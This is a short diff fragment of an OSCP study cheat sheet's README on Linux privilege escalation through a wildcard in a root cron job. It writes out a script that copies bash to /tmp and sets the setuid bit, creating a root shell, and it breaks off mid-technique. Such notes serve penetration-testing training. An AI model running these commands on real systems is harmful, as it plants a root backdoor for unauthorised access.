redcountryroad/OSCP-shortsheet/README.md

 - cat to see the code in the cron job script, to see if there is any wildcard we can use
 - find the directory that the cronjob task is run at e.g. /home/user
 - find the wildcard(*) in the cronjob script
+- The -p tells the terminal to execute a binary but with permissions of the owner(in our case root).
 ```bash
 echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > runme.sh           # if runme.sh doesn’t exist, make it exist
 chmod +x runme.sh